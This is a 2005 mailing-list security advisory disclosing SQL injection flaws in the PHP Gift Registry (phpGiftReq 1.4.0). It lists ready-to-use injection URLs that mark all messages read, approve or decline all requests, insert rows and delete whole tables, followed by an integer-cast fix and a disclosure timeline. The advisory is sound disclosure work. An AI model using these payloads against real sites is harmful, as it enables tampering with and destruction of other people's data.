[<prev] [next>] [day] [month] [year] [list]
Message-ID: <41EAA8C8.6050600@iname.com>
Date: Sun, 16 Jan 2005 18:47:52 +0100
From: Madelman <madelman@...me.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com,
full-disclosure@...ts.netsys.com, news@...uriteam.com,
staff@...ketstormsecurity.com, vuln@...unia.com
Subject: phpGiftReq SQL Injection
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: phpGiftReq SQL Injection
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 16/01/2005
Severity: Moderately critical
Summary:
- --------
The PHP Gift Registry is a web-enabled gift registry intended for use
among a circle of family members or friends
(from vendor site: http://phpgiftreg.sourceforge.net/)
phpGiftReq doesn't validate the parameters. This allows SQL Injection
and modification of data in the database.
This vulnerability has been tested with phpGiftReq 1.4.0
Details:
- --------
Acknowledge all messages
http://[SERVER]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1
Approve all pending requests
http://[SERVER]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1
Decline all pending requests
http://[SERVER]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1
Inserts current shopper for buying to user 3 without need for approval
http://[SERVER]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100
Delete all data from table shoppers
http://[SERVER]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1
Delete all data from table items
http://[SERVER]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1
I'm fairly sure there are a lot more places where SQL can be injected,
but I don't havetime to check them all.
Solution:
- ---------
All parameters should be converted to integers before creating the query.
Example:
Substitute
if ($action == "ack") {
~ $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
$_GET["messageid"];
~ mysql_query($query) or die("Could not query: " . mysql_error());
}
with
if ($action == "ack") {
~ $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
((int) $_GET["messageid"]);
~ mysql_query($query) or die("Could not query: " . mysql_error());
}
Timeline
- --------
31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFB6qif3RWooxY20cIRAmSdAKCJEpPvYyfMpLC0YVP0XMz7OK7maQCcDZOC
DI/zEDH+ORCaUt2uvRiL1eo=
=44JS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists